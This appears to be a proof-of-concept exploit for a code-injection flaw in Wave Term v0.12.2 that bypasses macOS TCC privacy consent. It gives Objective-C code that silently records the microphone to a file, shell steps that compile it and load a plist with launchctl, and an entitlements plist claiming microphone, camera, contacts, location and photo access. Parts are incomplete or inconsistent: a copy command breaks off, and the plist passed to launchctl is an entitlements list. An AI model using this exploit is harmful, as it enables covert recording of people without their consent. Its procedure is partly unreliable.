Code Injection in Wave Term v0.12.2 allowing TCC Bypass

#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@interface MicRecorder : NSObject < AVCaptureFileOutputRecordingDelegate > @property (strong) AVCaptureSession  * session;
@property (strong) AVCaptureMovieFileOutput  * output;
@end
@implementation MicRecorder
 -  (instancetype)init {
    self = [super init];
    if (self)  {
        self.session = [[AVCaptureSession alloc] init];
        self.output = [[AVCaptureMovieFileOutput alloc] init];
        // Audio device (default microphone)
        AVCaptureDevice  * mic = [AVCaptureDevice
        defaultDeviceWithMediaType:AVMediaTypeAudio];
        NSError  * error = nil;
        AVCaptureDeviceInput  * input = [AVCaptureDeviceInput deviceInputWithDevice:mic
        error:&error];
        if (!input)  {
            NSLog(@"Failed to open microphone: %@", error);
            return nil;
        }

        if ([self.session canAddInput:input])  {
            [self.session addInput:input];
        }

        if ([self.session canAddOutput:self.output])  {
            [self.session addOutput:self.output];
        }

    }

    return self;
}

 -  (void)startRecording:(NSString  * )path duration:(int)seconds {
    NSURL  * url = [NSURL fileURLWithPath:path];
    [self.session startRunning];
    [self.output startRecordingToOutputFileURL:url recordingDelegate:self];
    dispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(seconds  *  NSEC_PER_SEC)), dispatch_get_main_queue(), ^ {
        [self.output stopRecording];
        [self.session stopRunning];
        NSLog(@"Recording finished: %@", path);
        CFRunLoopStop(CFRunLoopGetMain());
    }

    );
}

@end
int main(int argc, const char  *  argv[]) {
    @autoreleasepool {
        MicRecorder  * recorder = [[MicRecorder alloc] init];
        NSString  * outfile = @"/tmp/mic-record.mov";
        int duration = (argc > 1) ? atoi(argv[1]) : 5;
        [recorder startRecording:outfile duration:duration];
        CFRunLoopRun();
    }

    return 0;
}

# Show mic.m source
cat mic.m

# Compile
gcc -fobjc-arc -framework Foundation -framework AVFoundation mic.m -o mic

# Copy mic to /tmp (avoid TCC disk access warning)
cp mic /tmp/mic

# List /tmp contents
ls /tmp/

# Show bypass.plist
cat bypass.plist

# Launchctl (unload/load plist)
launchctl unload bypass.plist
launchctl load bypass.plist

# Copy recording
cp /tmp

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
    <dict>
        <key>com.apple.security.cs.allow-jit</key>
        <true />
        <key>com.apple.security.cs.allow-unsigned-executable-memory</key>
        <true />
        <key>com.apple.security.cs.disable-library-validation</key>
        <true />
        <key>com.apple.security.device.audio-input</key>
        <true />
        <key>com.apple.security.device.camera</key>
        <true />
        <key>com.apple.security.personal-information.addressbook</key>
        <true />
        <key>com.apple.security.personal-information.calendars</key>
        <true />
        <key>com.apple.security.personal-information.location</key>
        <true />
        <key>com.apple.security.personal-information.photos-library</key>
        <true />
    </dict>
</plist>